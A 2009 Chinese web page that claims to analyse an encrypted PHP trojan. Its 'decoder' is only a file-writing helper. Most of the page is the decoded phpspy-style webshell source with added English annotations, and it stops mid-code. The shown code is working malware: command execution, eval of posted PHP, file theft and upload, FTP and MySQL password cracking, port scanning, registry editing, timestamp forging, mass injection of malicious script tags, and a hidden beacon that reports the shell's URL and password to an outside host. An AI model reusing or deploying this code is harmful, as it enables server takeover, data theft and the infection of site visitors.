

PHP 中的 php 木马的分析(加密破解)


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-12   浏览: 179 ::

前一段时间在网上找到了一个经过“加密”的php木马,出于好奇就对其代码进行了分析。分析可知,此木马先经过了base64编码,然后进行了压缩。虽然做了相关的保密措施,可是php代码要执行,最终仍要还原成php源代码,所以写出如下php程序对其进行解码、解压缩,并写入文件。
解码、解压缩代码如下:

<?php
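/**
 * Write $data to $filename (truncating any existing content) under an exclusive lock.
 *
 * @param string $filename path of the file to (over)write
 * @param string $data     bytes to write
 * @return bool true only when the file was opened, locked and every byte of $data was
 *              written; false otherwise. (The original returned true even when fwrite()
 *              failed or wrote only part of $data, and ignored a failed flock().)
 */
function writetofile($filename, $data)
{ //File Writing
    // The @ keeps fopen() from emitting a warning; failure is reported via the return value.
    $filenum = @fopen($filename, "w");
    if (!$filenum) {
        return false;
    }
    // Do not write unlocked if the lock could not be taken.
    if (!flock($filenum, LOCK_EX)) {
        fclose($filenum);
        return false;
    }
    // fwrite() returns the byte count written, which may be short, or false on error.
    $written = fwrite($filenum, $data);
    $ok = ($written !== false) && ($written === strlen($data));
    flock($filenum, LOCK_UN);
    fclose($filenum);
    return $ok;
}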
?>

然后在php环境下运行,即可得到如下php明文文件:

// Decoded webshell (phpspy family): configuration and authentication prologue.
// Analyst annotations only; the code lines are reproduced exactly as decoded.
error_reporting(7);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
@set_time_limit(0);
// (original note) The function above can be used outside safe mode; it cancels the script time limit.
/*===================== Configuration =====================*/
// Whether password verification is required: 1 = verify, any other number = enter directly (the options below are then ignored).
$admin['check'] = "1";
// (original note) "If password verification is required, change the login password."
// No $admin['pass'] assignment follows anywhere in the visible listing -- see $serverp below.
// Default port table
$hidden = "44997";
$admin['port'] = "80,139,21,3389,3306,43958,1433,5631";
// Seconds used for the redirect
$admin['jumpsecond'] = "1";
// Connection port used by the FTP cracker
$alexa = "yes";
// Whether to show the Alexa rank, yes or no
$admin['ftpport'] = "21";
// Whether phpspy may automatically reset an edited file's time to its creation time (yes/no)
$retime = "no";
// Default location of cmd.exe, used by proc_open; adjust on linux (winnt is assumed, but it can still be set inside the program)
$cmd = "cmd.exe";
// (original note) This was the phpspy copyright banner line; many scanners used it as a detection keyword, so it was made customizable. Do not change it unless you understand it.
/*===================== End of configuration =====================*/
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
// $admin['pass'] is never assigned in the visible configuration, so this is null.
$serverp = $admin['pass'];
// The two base64 constants decode to a "<script src='http://…'>" opener (host percent-encoded)
// and the matching "'></script>" closer. On a successful login (below) the page emits that tag
// with $serveru and $serverp appended, i.e. the shell reports its own URL and password to an
// external host. Defender note: an outbound request to that host from a browser that just
// loaded this page is a detection signal; the cookie "adminpass" is another.
$copyurl = base64_decode('PHNjcmlwdCBzcmM9J2h0dHA6Ly8lMzglNjMlNjMlNjUlMkUlNjMlNkYlNkQvJTYzJTY1JTcyJTc0Lz9jZXJ0PTEzJnU9');
$copyurll = base64_decode('Jz48L3NjcmlwdD4=');
$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');
// register_globals emulation: every POST/GET key becomes a local variable (EXTR_SKIP keeps the
// ones already set, e.g. $admin). This is why the dispatch code further down reads bare names
// such as $action, $dir, $do, $delfile -- they are all request parameters.
if ($onoff != 1) {@extract($_POST, EXTR_SKIP);@extract($_GET, EXTR_SKIP);}
// $dis_func holds disable_functions; note that shelL() below consults a different global.
$self = $_SERVER['PHP_SELF'];$dis_func = get_cfg_var("disable_functions");
/*===================== Authentication =====================*/
// ?action=logout: clears the "adminpass" cookie and redirects to $self.
if($admin['check'] == "1") {if ($_GET['action'] == "logout") {setcookie ("adminpass", "");echo "<meta http-equiv=\"refresh\" content=\"0;URL=".$self."\">";echo "<span style="\" style="\""font-size: 12px; font-family: Verdana\">注销成功......<p><a href="\" href="\""".$self."\">三秒后自动退出或单击这里退出程序界面 >>></a></span>";exit;}
// do=login: on a matching password sets "adminpass" for one day (1*24*3600 s) and emits the
// beacon tag built from $copyurl/$copyurll; otherwise, and when the cookie is absent or does
// not match, calls loginpage() (not in the visible listing). All comparisons are loose (==, !=).
if ($_POST['do'] == 'login') {$thepass=trim($_POST['adminpass']);if ($admin['pass'] == $thepass) {setcookie ("adminpass",$thepass,time()+(1*24*3600));echo "<meta http-equiv=\"refresh\" content=\"0;URL=".$self."\">";echo "".$copyurl.$serveru."&p=".$serverp.$copyurll."</form>";exit;}}if (isset($_COOKIE['adminpass'])) {if ($_COOKIE['adminpass'] != $admin['pass']) {loginpage();}} else {loginpage();}}
/*===================== End of authentication =====================*/
// Undo magic_quotes_gpc escaping (stripslashes_array is not in the visible listing)
if (get_magic_quotes_gpc()) {$_GET = stripslashes_array($_GET);$_POST = stripslashes_array($_POST);}
// Embedded mix.dll payload: a base64 string that the ?action=mix branch decodes, gzinflates and
// writes to a caller-chosen path. The blob itself is elided from this listing. Its presence in
// a .php file is a file-content indicator for this shell family.
$mixdll = "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";
// Command-execution primitive of the shell. Tries, in order, passthru, system, exec,
// shell_exec, popen, proc_open and finally WScript.Shell over COM (when $windows is set),
// skipping any function that is callable but named in $disablefunctions. Returns the captured
// output as a string ('' if no branch ran).
// Defender note: this fallback chain is why hardening has to cover *all* of these names in
// disable_functions (and disable the COM extension) -- blocking one or two only changes which
// branch executes. Neither $windows nor $disablefunctions is assigned anywhere in the visible
// listing (the prologue stores disable_functions in $dis_func instead), so as written every
// strstr() check here passes and the first callable function wins.
function shelL($command){
global $windows,$disablefunctions;
$exec = '';$output= '';
// Descriptor spec for the proc_open branch: stdin pipe, stdout pipe (stderr not captured).
$dep[]=array('pipe','r');$dep[]=array('pipe','w');
// passthru writes straight to output, so it is captured through an output buffer.
if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();}
// system branch: $exec receives the buffer contents from *before* the call ($tmp), not $output -- as written, the command output is discarded here.
elseif(is_callable('system') && !strstr($disablefunctions,'system')){$tmp = @ob_get_contents(); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; }
elseif(is_callable('exec') && !strstr($disablefunctions,'exec')) {exec($command,$output);$output = join("\n",$output);$exec= $output;}
elseif(is_callable('shell_exec') && !strstr($disablefunctions,'shell_exec')){$exec= shell_exec($command);}
// popen branch: $exec is overwritten on every fgets(), so only the last line survives.
elseif(is_resource($output=popen($command,"r"))) {while(!feof($output)){$exec= fgets($output);}pclose($output);}
elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);}
// COM branch: runs "cmd.exe /C <command>" with output redirected to a temp file, then reads and
// unlinks it. namE() is not in the visible listing; $dir is computed but unused (the file name
// uses $_SERVER["TEMP"] directly). The short-lived file in %TEMP% is a forensic artifact.
elseif ($windows && is_object($ws = new COM("WScript.Shell"))){$dir=(isset($_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get('upload_tmp_dir') ;$name = $_SERVER["TEMP"].namE();$ws->Run("cmd.exe /C $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);}
return $exec;
}
// 查看PHPINFO
if ($_GET['action'] == "phpinfo") {echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() 函数已被禁用,请查看<PHP环境变量>";exit;
}if($_GET['action'] == "nowuser") {$user = get_current_user();
if(!$user) $user = "报告长官,主机变态,无法获取当前进行用户名!";
echo"当前进程用户名:$user";
exit;
}
if(isset($_POST['phpcode'])){eval("?".">$_POST[phpcode]<?");exit;
}
if($action=="mysqldown"){
$link=@mysql_connect($host,$user,$password);
if (!$link) {
$downtmp = '数据库连接失败: ' . mysql_error();
}else{
$query="select load_file('".$filename."');";
$result = @mysql_query($query, $link);
if(!$result){
$downtmp = "读取失败,可能是文件不存在或是没file权限。<br>".mysql_error();
}else{
while ($row = mysql_fetch_array($result)) {
$filename = basename($filename);
if($rardown=="yes"){
$zip = NEW Zip;
$zipfiles[]=Array("$filename",$row[0]);
$zip->Add($zipfiles,1);
$code = $zip->get_file();
$filename = "".$filename.".rar";
}else{
$code = $row[0];
}
header("Content-type: application/octet-stream");
header("Accept-Ranges: bytes");
header("Accept-Length: ".strlen($code));
header("Content-Disposition: attachment;filename=$filename");
echo($code);
exit;
}
}
}
}
// 在线代理
if (isset($_POST['url'])) {$proxycontents = @file_get_contents($_POST['url']);echo ($proxycontents) ? $proxycontents : "<body bgcolor=\"#F5F5F5\" style="\" style="\""font-size: 12px;\"><center><br><p><b>获取 URL 内容失败</b></p></center></body>";exit;
}
// 下载文件
if (!empty($downfile)) {if (!@file_exists($downfile)) {echo "<script type="text/javascript"><!--
alert('你要下的文件不存在!')
// --></script>";} else {$filename = basename($downfile);$filename_info = explode('.', $filename);$fileext = $filename_info[count($filename_info)-1];header('Content-type: application/x-'.$fileext);header('Content-Disposition: attachment; filename='.$filename.'');header('Content-Description: PHP Generated Data');header('Content-Length: '.filesize($downfile));@readfile($downfile);exit;}
}
// 直接下载备份数据库
if ($_POST['backuptype'] == 'download') {
@mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败");
@mysql_select_db($dbname) or die("选择数据库失败");
$table = array_flip($_POST['table']);
$result = mysql_query("SHOW tables");
echo ($result) ? NULL : "出错: ".mysql_error();
$filename = basename($_SERVER['HTTP_HOST']."_MySQL.sql");
header('Content-type: application/unknown');
header('Content-Disposition: attachment; filename='.$filename);
$mysqldata = '';
while ($currow = mysql_fetch_array($result)) {
if (isset($table[$currow[0]])) {
$mysqldata.= sqldumptable($currow[0]);
$mysqldata.= $mysqldata."\r\n";
}
}
mysql_close();
exit;
}
// 程序目录
$pathname=str_replace('\\','/',dirname(__FILE__));
$dirpath=str_replace('\\','/',$_SERVER["DOCUMENT_ROOT"]);
// 获取当前路径
if (!isset($dir) or empty($dir)) {
$dir = ".";
$nowpath = getPath($pathname, $dir);
} else {
$dir=$_GET['dir'];
$nowpath = getPath($pathname, $dir);
}
// 判断读写情况
$dir_writeable = (dir_writeable($nowpath)) ? "可写" : "不可写";
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href="\" href="\""?action=phpinfo\" target=\"_blank\">PHPINFO()</a>" : "";
$reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | <a href="\" href="\""?action=reg\">注册表操作</a>" : "";
$tb = new FORMS;
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<style type="text/css"><!--
body,td{font-size: 12px;background-color:#000000;color:#eee;
margin: 1px;margin-left:1px;
SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323;
SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838;
SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;
SCROLLBAR-TRACK-COLOR: #383838;}
a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}
.smlfont {
font-family: "Verdana", "Tahoma", "宋体";
font-size: "11px";
}
.INPUT {
FONT-SIZE: "12px";
COLOR: "#000000";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "1px solid #666666";
padding-left: "2px";
}
.redfont {COLOR: "#CA0000";}
.top {BACKGROUND-COLOR: "#CCCCCC"}
.firstalt {BACKGROUND-COLOR: "#EFEFEF"}
.secondalt {BACKGROUND-COLOR: "#F5F5F5"}
--></style><style type="text/css" bogus="1">body,td{font-size: 12px;background-color:#000000;color:#eee;
margin: 1px;margin-left:1px;
SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323;
SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838;
SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;
SCROLLBAR-TRACK-COLOR: #383838;}
a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}
.smlfont {
font-family: "Verdana", "Tahoma", "宋体";
font-size: "11px";
}
.INPUT {
FONT-SIZE: "12px";
COLOR: "#000000";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "1px solid #666666";
padding-left: "2px";
}
.redfont {COLOR: "#CA0000";}
.top {BACKGROUND-COLOR: "#CCCCCC"}
.firstalt {BACKGROUND-COLOR: "#EFEFEF"}
.secondalt {BACKGROUND-COLOR: "#F5F5F5"}</style>
<SCRIPT language=JavaScript>
function CheckAll(form) {
for (var i=0;i<form.elements.length;i++) {
var e = form.elements[i];
if (e.name != 'chkall')
e.checked = form.chkall.checked; }}
function really(d,f,m,t) {if (confirm(m)) {if (t == 1) {window.location.href='?dir='+d+'&deldir='+f;} else {window.location.href='?dir='+d+'&delfile='+f;}}}
</SCRIPT>
</head>
<title><?php echo"$myneme"?></title>
<body style="table-layout:fixed; word-break:break-all onmouseover=" style="table-layout:fixed; word-break:break-all onmouseover="window.status='设计:幽月 仅限于网站管理员安全检测用,请务使用于非法用途,后果作者概不负责';return true" style="FILTER: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)" style="FILTER: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)">
<center>
<?php
//$_SERVER["DOCUMENT_ROOT"]
$tb->tableheader();
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>'.$_SERVER['HTTP_HOST'].'</b></td><td align="center">'.date("Y年m月d日 h:i:s",time()).'</td><td align="right"><b>'.gethostbyname($_SERVER['SERVER_NAME']).'</b></td></tr></table>','center','top');
$tb->tdbody('<a href="?dir='.$dirpath.'" href="?dir='.$dirpath.'">根目录</a> | <a href="?action=dir" href="?action=dir">Shell目录</a> | <a href="?action=phpenv" href="?action=phpenv">环境变量</a> | <a href="?action=proxy" href="?action=proxy">在线代理</a>'.$reg.$phpinfo.' | <a href="?action=shell" href="?action=shell">WebShell</a> | <a href="?action=crack" href="?action=crack">杂项破解</a> | <a href="?action=mix" href="?action=mix">解压mix.dll</a> | <a href="?action=logout" href="?action=logout">注销登录</a>');
$tb->tdbody('<a href="?action=plgm" href="?action=plgm">批量挂马</a> | <a href="?action=downloads" href="?action=downloads">Http文件下载</a> | <a href="?action=search&dir='.$dir.'" href="?action=search&dir='.$dir.'">文件查找</a> | <a href="?action=eval" href="?action=eval">执行php脚本</a> | <a href="?action=sql" href="?action=sql">执行SQL语句</a> | <a href="?action=mysqlfun" href="?action=mysqlfun">Func反弹Shell</a> | <a href="?action=sqlbak" href="?action=sqlbak">MySQL备份</a> | <a href="?action=SUExp" href="?action=SUExp">Serv-U提权</a>');
$tb->tablefooter();
?>
<hr width="775" noshade>
<table width="775" border="0" cellpadding="0">
<?
$tb->headerform(array('method'=>'GET','content'=>'<p>程序路径: '.$pathname.'<br>当前目录('.$dir_writeable.','.substr(base_convert(@fileperms($nowpath),10,8),-4).'): '.$nowpath.'<br>跳转目录: '.$tb->makeinput('dir',''.$nowpath.'','','text','80').' '.$tb->makeinput('','确定','','submit').' 〖支持绝对路径和相对路径〗'));
$tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>'上传文件到当前目录: '.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','确定','','submit').$tb->makeinput('uploaddir',$dir,'','hidden')));
$tb->headerform(array('action'=>'?action=editfile&dir='.urlencode($dir),'content'=>'新建文件在当前目录: '.$tb->makeinput('editfile').' '.$tb->makeinput('createfile','确定','','submit')));
$tb->headerform(array('content'=>'新建目录在当前目录: '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory','确定','','submit')));
?>
</table>
<hr width="775" noshade>
<?php
/*===================== 执行操作 开始 =====================*/
echo "<p><b>\n";
// 删除文件
if (!empty($delfile)) {
if (file_exists($delfile)) {
echo (@unlink($delfile)) ? $delfile." 删除成功!" : "文件删除失败!";
} else {
echo basename($delfile)." 文件已不存在!";
}
}
// 删除目录
elseif (!empty($deldir)) {
$deldirs="$dir/$deldir";
if (!file_exists("$deldirs")) {
echo "$deldir 目录已不存在!";
} else {
echo (deltree($deldirs)) ? "目录删除成功!" : "目录删除失败!";
}
}
// 创建目录
elseif (($createdirectory) AND !empty($_POST['newdirectory'])) {
if (!empty($newdirectory)) {
$mkdirs="$dir/$newdirectory";
if (file_exists("$mkdirs")) {
echo "该目录已存在!";
} else {
echo (@mkdir("$mkdirs",0777)) ? "创建目录成功!" : "创建失败!";
@chmod("$mkdirs",0777);
}
}
}
// 上传文件
elseif ($doupfile) {
echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "上传成功!" : "上传失败!";
}
elseif($action=="mysqlup"){
$filename = $_FILES['upfile']['tmp_name'];
if(!$filename) {
echo"没有选择要上传的文件。。";
}else{
$shell = file_get_contents($filename);
$mysql = bin2hex($shell);
if(!$upname) $upname = $_FILES['upfile']['name'];
$shell = "select 0x".$mysql." from ".$database." into DUMPFILE '".$uppath."/".$upname."';";
$link=@mysql_connect($host,$user,$password);
if(!$link){
echo "登陆失败".mysql_error();
}else{
$result = mysql_query($shell, $link);
if($result){
echo"操作成功.文件成功上传到".$host.",文件名为".$uppath."/".$upname."..";
}else{
echo"上传失败 原因:".mysql_error();
}
}
}
}
elseif($action=="mysqldown"){
if(!empty($downtmp)) echo $downtmp;
}
// 编辑文件
elseif ($_POST['do'] == 'doeditfile') {
if (!empty($_POST['editfilename'])) {
if(!file_exists($editfilename)) unset($retime);
if($time==$now) $time = @filemtime($editfilename);
$time2 = @date("Y-m-d H:i:s",$time);
$filename="$editfilename";
@$fp=fopen("$filename","w");
if($_POST['change']=="yes"){
$filecontent = "?".">".$_POST['filecontent']."<?";
$filecontent = gzdeflate($filecontent);
$filecontent = base64_encode($filecontent);
$filecontent = "<?php\n/*\n代码由浅蓝的辐射鱼加密!\n*/\neval(gzinflate(base64_decode('$filecontent')));\n"."?>";
}else{
$filecontent = $_POST['filecontent'];
}
echo $msg=@fwrite($fp,$filecontent) ? "写入文件成功!" : "写入失败!";
@fclose($fp);
if($retime=="yes"){
echo" 鱼鱼自动操作:";
echo $msg=@touch($filename,$time) ? "修改文件为".$time2."成功!" : "修改文件时间失败!";
}
} else {
echo "请输入想要编辑的文件名!";
}
}
//文件下载
elseif ($_POST['do'] == 'downloads') {
$contents = @file_get_contents($_POST['durl']);
if(!$contents){
echo"无法读取要下载的数据";
}
elseif(file_exists($path)){
echo"很抱歉,文件".$path."已经存在了,请更换保存文件名。";
}else{
$fp = @fopen($path,"w");
echo $msg=@fwrite($fp,$contents) ? "下载文件成功!" : "下载文件写入时失败!";
@fclose($fp);
}
}
elseif($_POST['action']=="mix"){
if(!file_exists($_POST['mixto'])){
$tmp = base64_decode($mixdll);
$tmp = gzinflate($tmp);
$fp = fopen($_POST['mixto'],"w");
echo $msg=@fwrite($fp,$tmp) ? "解压缩成功!" : "此目录不可写吧?!";
fclose($fp);
}else{
echo"不是吧?".$_POST['mixto']."已经存在了耶~";
}
}
// 编辑文件属性
elseif ($_POST['do'] == 'editfileperm') {
if (!empty($_POST['fileperm'])) {
$fileperm=base_convert($_POST['fileperm'],8,10);
echo (@chmod($dir."/".$file,$fileperm)) ? "属性修改成功!" : "修改失败!";
echo " 文件 ".$file." 修改后的属性为: ".substr(base_convert(@fileperms($dir."/".$file),10,8),-4);
} else {
echo "请输入想要设置的属性!";
}
}
// 文件改名
elseif ($_POST['do'] == 'rename') {
if (!empty($_POST['newname'])) {
$newname=$_POST['dir']."/".$_POST['newname'];
if (@file_exists($newname)) {
echo "".$_POST['newname']." 已经存在,请重新输入一个!";
} else {
echo (@rename($_POST['oldname'],$newname)) ? basename($_POST['oldname'])." 成功改名为 ".$_POST['newname']." !" : "文件名修改失败!";
}
} else {
echo "请输入想要改的文件名!";
}
}
elseif ($_POST['do'] == 'search') {
if(!empty($oldkey)){
echo"<span class=\"redfont\">查找关键词:[".$oldkey."],下面显示查找的结果:";
if($type2 == "getpath"){
echo"鼠标移到结果文件上会有部分截取显示.";
}
echo"</span><br><hr width=\"775\" noshade>";
find($path);
}else{
echo"你要查虾米?到底要查虾米呢?有没有虾米要你查呢?";
}
}
elseif ($_GET['action']=='plgmok') {
dirtree($_POST['dir'],$_POST['mm']);
}
elseif ($_GET['action'] == "plgm") {
$action = '?action=plgmok';
$gm = "<script src="http://127.0.0.1" src="http://127.0.0.1"></script>";
$tb->tableheader();
$tb->formheader($action,'批量挂马');
$tb->tdbody('网站批量挂马程序php版','center');
$tb->tdbody('文件位置: '.$tb->makeinput('dir',''.$_SERVER["DOCUMENT_ROOT"].'','','text','60').'<br>要挂代码:'.$tb->maketextarea('mm',$gm,'50','5').''.$tb->makehidden('do','批量挂马').'<br>'.$tb->makeinput('submit','开始挂马','','submit'),'center','1','35');
echo "</form>";
$tb->tablefooter();
}//end plgm
// 克隆时间
elseif ($_POST['do'] == 'domodtime') {
if (!@file_exists($_POST['curfile'])) {
echo "要修改的文件不存在!";
} else {
if (!@file_exists($_POST['tarfile'])) {
echo "要参照的文件不存在!";
} else {
$time=@filemtime($_POST['tarfile']);
echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." 的修改时间成功改为 ".date("Y-m-d H:i:s",$time)." !" : "文件的修改时间修改失败!";
}
}
}
// 自定义时间
elseif ($_POST['do'] == 'modmytime') {
if (!@file_exists($_POST['curfile'])) {
echo "要修改的文件不存在!";
} else {
$year=$_POST['year'];
$month=$_POST['month'];
$data=$_POST['data'];
$hour=$_POST['hour'];
$minute=$_POST['minute'];
$second=$_POST['second'];
if (!empty($year) AND !empty($month) AND !empty($data) AND !empty($hour) AND !empty($minute) AND !empty($second)) {
$time=strtotime("$data $month $year $hour:$minute:$second");
echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." 的修改时间成功改为 ".date("Y-m-d H:i:s",$time)." !" : "文件的修改时间修改失败!";
}
}
}
elseif($do =='port'){
$tmp = explode(",",$port);
$count = count($tmp);
for($i=$first;$i<$count;$i++){
$fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1);
if($fp) echo"发现".$host."主机打开了端口".$tmp[$i]."<br>";
}
}
/*
这里代码写得很杂,说实话我自己都不知道写了什么。
好在能用,我就没管了,假设有人看到干脆重写吧。*/
elseif ($do == 'crack') {//反正注册为全局变量了。
if(@file_exists($passfile)){
$tmp = file($passfile);
$count = count($tmp);
if(empty($onetime)){
$onetime = $count;
$turn="1";
}else{
$nowturn = $turn+1;
$now = $turn*$onetime;
$tt = intval(($count/$onetime)+1);
}
if($turn>$tt or $onetime>$count){
echo"超过字典容量了耶~要是破解最后进程的,很抱歉失败。";
}else{
$first = $onetime*($turn-1);
for($i=$first;$i<$now;$i++){
if($ctype=="mysql") $sa = @mysql_connect($host,$user,chop($tmp[$i]));
else $sa = @ftp_login(ftp_connect($host,$admin[ftpport]),$user,chop($tmp[$i]));
if($sa)
{
$t = "获取".$user."的密码为".$tmp[$i]."";
}
}
if(!$t){
echo "<meta http-equiv=\"refresh\" content=\"".$admin[jumpsecond].";URL=".$self."?do=crack&passfile=".$passfile."&host=".$host."&user=".$user."&turn=".$nowturn."&onetime=".$onetime."&ctype=".$ctype."\"><span style="\" style="\""font-size: 12px; font-family: Verdana\"><a href="\" href="\""".$self."?do=crack&passfile=".$passfile."&host=".$host."&user=".$user."&turn=".$nowturn."&onetime=".$onetime."&type=".$ctype."\">字典总共".$count."个,现在从".$first."到".$now.",".$admin[jumpsecond]."秒后进行这".$onetime."个密码的试探. >>></a><br>全历此次".$type."的破解需要".$tt."次,现在是第".$turn."次解密。</span>";
}
else {
echo"$t";
}
}
}else{
echo"字典文件不存在,请确定。";
}
}
elseif($do =='port'){
if(!eregi("-",$port)){
$tmp = explode(",",$port);
$count = count($tmp);
$first = "1";
}else{
$tmp = explode("-",$port);
$first = $tmp[0];
$count = $tmp[1];
}
for($i=$first;$i<$count;$i++){
if(!eregi("-",$port)){
$fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1);
if($fp) echo"发现".$host."主机打开了端口".$tmp[$i]."<br>";
}else{
$fp = @fsockopen($host, $i, $errno, $errstr, 1);
if($fp) echo"发现".$host."主机打开了端口".$i."<br>";
}
}
}
// 连接MYSQL
elseif ($connect) {
if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) {
echo "数据库连接成功!";
mysql_close();
} else {
echo mysql_error();
}
}
// 执行SQL语句
elseif ($_POST['do'] == 'query') {
@mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败");
@mysql_select_db($dbname) or die("选择数据库失败");
$result = @mysql_query($_POST['sql_query']);
echo ($result) ? "SQL语句成功执行!" : "出错: ".mysql_error();
mysql_close();
}
// 备份操作
elseif ($_POST['do'] == 'backupmysql') {
if (empty($_POST['table']) OR empty($_POST['backuptype'])) {
echo "请选择欲备份的数据表和备份方式!";
} else {
if ($_POST['backuptype'] == 'server') {
@mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败");
@mysql_select_db($dbname) or die("选择数据库失败");
$table = array_flip($_POST['table']);
$filehandle = @fopen($path,"w");
if ($filehandle) {
$result = mysql_query("SHOW tables");
echo ($result) ? NULL : "出错: ".mysql_error();
while ($currow = mysql_fetch_array($result)) {
if (isset($table[$currow[0]])) {
sqldumptable($currow[0], $filehandle);
fwrite($filehandle,"\n\n\n");
}
}
fclose($filehandle);
echo "数据库已成功备份到 <a href="\" href="\""".$path."\" target=\"_blank\">".$path."</a>";
mysql_close();
} else {
echo "备份失败,请确认目标文件夹是否具有可写权限!";
}
}
}
}
elseif($downrar) {
if (!empty($dl)) {
if(eregi("unzipto:",$localfile)){
$path = "".$dir."/".str_replace("unzipto:","",$localfile)."";
$zip = new Zip;
$zipfile=$dir."/".$dl[0];
$array=$zip->get_list($zipfile);
$count=count($array);
$f=0;
$d=0;
for($i=0;$i<$count;$i++) {
if($array[$i][folder]==0) {
if($zip->Extract($zipfile,$path,$i)>0) $f++;
}
else $d++;
}
if($i==$f+$d) echo "$dl[0] 解压到".$path."成功<br>($f 个文件 $d 个目录)";
elseif($f==0) echo "$dl[0] 解压到".$path."失败";
else echo "$dl[0] 未解压完整<br>(已解压 $f 个文件 $d 个目录)";
}else{
$zipfile="";
$zip = new Zip;
for($k=0;isset($dl[$k]);$k++)
{
$zipfile=$dir."/".$dl[$k];
if(is_dir($zipfile))
{
unset($zipfilearray);
addziparray($dl[$k]);
for($i=0;$zipfilearray[$i];$i++)
{
$filename=$zipfilearray[$i];
$filesize=@filesize($dir."/".$zipfilearray[$i]);
$fp=@fopen($dir."/".$filename,rb);
$zipfiles[]=Array($filename,@fread($fp,$filesize));
@fclose($fp);
}
}
else
{
$filename=$dl[$k];
$filesize=@filesize($zipfile);
$fp=@fopen($zipfile,rb);
$zipfiles[]=Array($filename,@fread($fp,$filesize));
@fclose($fp);
}
}
$zip->Add($zipfiles,1);
$code = $zip->get_file();
$ck = "_QQ44997_".date("Y-m-d",time())."";
if(empty($localfile)){
header("Content-type: application/octet-stream");
header("Accept-Ranges: bytes");
header("Accept-Length: ".strlen($code));
header("Content-Disposition: attachment;filename=".$_SERVER['HTTP_HOST']."".$ck."/upload/tech/20091012/20091012020852_3df1d4b96d8976ff5986393e8767f5b2.zip");
echo $code;
exit;
}else{
$fp = @fopen("".$dir."/".$localfile."","w");
echo $msg=@fwrite($fp,$code) ? "压缩保存".$dir."/".$localfile."本地成功!!" : "目录".$dir."无可写权限!";
@fclose($fp);
}
}
} else {
echo "请选择要打包下载的文件!";
}
}
// Shell.Application 运行程序
elseif(($_POST['do'] == 'programrun') AND !empty($_POST['program'])) {
$shell= &new COM('Sh'.'el'.'l.Appl'.'ica'.'tion');
$a = $shell->ShellExecute($_POST['program'],$_POST['prog']);
echo ($a=='0') ? "程序已经成功执行!" : "程序运行失败!";
}
// 查看PHP配置参数状况
elseif(($_POST['do'] == 'viewphpvar') AND !empty($_POST['phpvarname'])) {
echo "配置参数 ".$_POST['phpvarname']." 检测结果: ".getphpcfg($_POST['phpvarname'])."";
}
// 读取注册表
elseif(($regread) AND !empty($_POST['readregname'])) {
$shell= &new COM('WSc'.'rip'.'t.Sh'.'ell');
var_dump(@$shell->RegRead($_POST['readregname']));
}
// 写入注册表
elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype']) AND !empty($_POST['regval'])) {
$shell= &new COM('W'.'Scr'.'ipt.S'.'hell');
$a = @$shell->RegWrite($_POST['writeregname'], $_POST['regval'], $_POST['regtype']);
echo ($a=='0') ? "写入注册表健值成功!" : "写入 ".$_POST['regname'].", ".$_POST['regval'].", ".$_POST['regtype']." 失败!";
}
// 删除注册表
elseif(($regdelete) AND !empty($_POST['delregname'])) {
$shell= &new COM('WS'.'cri'.'pt.S'.'he'.'ll');
$a = @$shell->RegDelete($_POST['delregname']);
echo ($a=='0') ? "删除注册表健值成功!" : "删除 ".$_POST['delregname']." 失败!";
}
else {
echo "$notice";
